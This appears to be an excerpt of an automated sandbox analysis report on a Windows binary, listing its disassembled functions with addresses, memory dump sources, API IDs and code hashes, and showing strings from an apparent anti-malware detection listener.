                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                  • String ID:
                                                                                  • API String ID: 15204871-0
                                                                                  • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                  • Instruction ID: 5f4b882b9df35341dd39bd442f57c0b50bfa1d57f82dec222764da056626ad92
                                                                                  • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                                  • Instruction Fuzzy Hash: 3FB10373A14B898BEB198F6DC8863687BA0F784B88F15C926DB5D837A4CB39D451C700
                                                                                  Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 203985260-0
                                                                                  • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                  • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                                                  • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                                  • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                                                  Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                  • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                                                  • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                                  • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                                                  Function 00007FF8BFB8A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                  • Instruction ID: 1de0d37c1db679e254a8bc3a8a5e4a2d49569e079a145498e4c0d471fc88d398
                                                                                  • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                                  • Instruction Fuzzy Hash: C751E922B0868155FB209BB9E8441AEBBA4FB85BD4F144235EF5C27A96DE3CD401C700
                                                                                  Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: EntryFunctionLookup
                                                                                  • String ID:
                                                                                  • API String ID: 3852435196-0
                                                                                  • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                  • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                                                  • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                                  • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                                                  Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                                  • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                                                  • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                                  • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                                                  Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                                  • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                                                  • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                                  • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                                                  Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -
                                                                                  • API String ID: 0-2547889144
                                                                                  • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                                  • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                                                  • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                                  • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                                                  Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -
                                                                                  • API String ID: 0-2547889144
                                                                                  • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                                  • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                                                  • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                                  • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                                                  Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                  • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                                                  • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                                  • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                                                  Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -
                                                                                  • API String ID: 0-2547889144
                                                                                  • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                                  • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                                                  • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                                  • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                                                  Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -
                                                                                  • API String ID: 0-2547889144
                                                                                  • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                                  • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                                                  • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                                  • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                                                  Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: -
                                                                                  • API String ID: 0-2547889144
                                                                                  • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                                  • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                                                  • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                                  • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                                                  Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                                  • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                                                  • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                                  • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                                                  Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                                  • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                                                  • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                                  • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                                                  Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                                  • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                                                  • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                                  • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                                                  Function 00007FF8BFB8FD40 Relevance: .0, Instructions: 32COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                  • Instruction ID: 97822f665f10c17863024004f9a74bf5525017205d058a13c3ae00ffc6403e3e
                                                                                  • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                  • Instruction Fuzzy Hash: 90F01271B196958AEBA48F6CA842A3977D0EB483C5F94D039D78D83B14D63C94618F14
                                                                                  Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 355 140003d35-140003d49 353->355 356 1400039f3-140003a04 #4 354->356 357 140003a09-140003a1a EnterCriticalSection 354->357 356->357 358 140003a67 357->358 359 140003a1c-140003a34 357->359 360 140003a6c-140003a8e LeaveCriticalSection 358->360 361 140003a36 359->361 362 140003a3e-140003a49 359->362 364 140003ab4-140003abe 360->364 365 140003a90-140003aad #4 360->365 361->362 362->360 363 140003a4b-140003a65 SetEvent ResetEvent 362->363 363->360 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->355
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                                                  • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                                                  • API String ID: 1021822269-3147033232
                                                                                  • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                  • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                                                  • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                  • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
                                                                                  Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
